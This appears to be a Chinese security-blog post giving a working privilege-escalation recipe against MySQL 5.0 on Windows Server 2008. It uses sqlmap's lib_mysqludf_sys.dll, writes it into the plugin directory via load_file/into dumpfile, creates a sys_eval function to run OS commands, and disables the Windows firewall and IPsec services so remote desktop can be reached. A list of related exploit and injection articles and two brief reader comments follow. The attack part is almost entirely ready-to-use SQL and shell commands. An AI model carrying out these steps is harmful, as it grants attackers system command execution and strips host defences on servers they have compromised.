看了这个:windows 2008 怎么利用mysql(5.0)提权然后想了下发下。不是什么新东西,很多人都应该会了。

以前分享在百度网盘,好像没人看。直接发文字说明不贴图了哦。

sqlmap lib_mysqludf_sys.zip

上传dll文件到任意目录,如:D:/RECYCLER/lib_mysqludf_sys.dll

导入dll,根据版本导入到windows或mysql 插件目录(一般执行select @@plugin_dir 可看到插件目录具体路径):

select load_file(‘D:/RECYCLER/lib_mysqludf_sys.dll’) into dumpfile’c:/windows/lib_mysqludf_sys.dll’(高版本需要导入上面查询到的插件目录)

创建function:

create function sys_eval returns string soname ‘lib_mysqludf_sys.dll’;

执行命令:

select sys_eval(‘whoami’);

一般情况下不会出现创建不成功哦。

连不上3389可以先停止windows防火墙和筛选

select sys_eval(‘net stop policyagent’);

select sys_eval(‘net stop sharedaccess’);

原文链接:SqlMap mysql udf.dll 提权

相关内容:

科普:Burpsuite导出log配合Sqlmap批量扫描注入点

mof提权带回显带清楚命令版本.php

[分享]一个Linux Kernel 提权Exp查询脚本

sqlmap用户手册[续]

Android ICS adb调试工具系统还原目录遍历漏洞(可提权)

Sqlmap注入技巧收集

sqlmap用户手册

waf 绕过的技巧,SQL 注入中绕过 waf 的技巧

Linux PREF_EVENTS Local Root 2.6.37-3.8.10 x86_64,本地提权

Access SQL 注入参考手册(小抄),Access Cheat Sheet

Access高级玩法经验解说

利用 xss 执行 sql 注入

MySQL 的 Windows 远程系统级漏洞(Stuxnet 病毒采用的技术)

About Mysql 的那个提权漏洞

星外(7i24)虚拟主机管理系统,提权方案、方法集合

sqlmap 中文使用说明

MySql 被降权提权思路,反弹低权限CmdShell,鸡肋文章,略狗血……

iis6 提权提示 Can not find wmiprvse.exe 的突破方法

基于 Http Header 的 SQL 注入

一些本地提权漏洞,对应的补丁序列号,提权的时候会用到

突破 Sql 防注入过滤程序继续注入的一点方法、经验、技巧总结

MS11-046 本地提权漏洞利用代码

windows2003 x64 提权一点经验

mysql udf 提权要注意的 - 技术文章

sqlmap 使用文档

关于国内各种所谓的“大牛B”,及各种版本的本地提权工具想说的。

星外提权辅助工具(绝非0day,只是辅助工具)

基于 SQL 注入(sql injection) 介绍一些注射技巧 - 技术文章

linux 全自动提权脚本(转)

关于ZKEYS虚拟主机管理提权

Windows Server 2003/2008 本地提权 0day

【渗透】各种提权 渗透 经验 技巧总结大全

【Linux】linux提权 Root权限WebShell提权

关于“最强体积最小提权超猛asp大马”后门问题

【VC源码】MySql,MsSql弱口令混合扫描利用工具

SQL注入攻击和深层攻击方式发掘

【Exp】金山网盾内核模式本地提权

留言评论(旧系统):

佚名 @ 2014-08-17 14:55:43

沙发~

本站回复:

-_-|||

五折 @ 2014-08-21 12:22:48

2008..UDF..似乎..遇到过几次,都是照葫芦画瓢搞的

本站回复:

-_-|||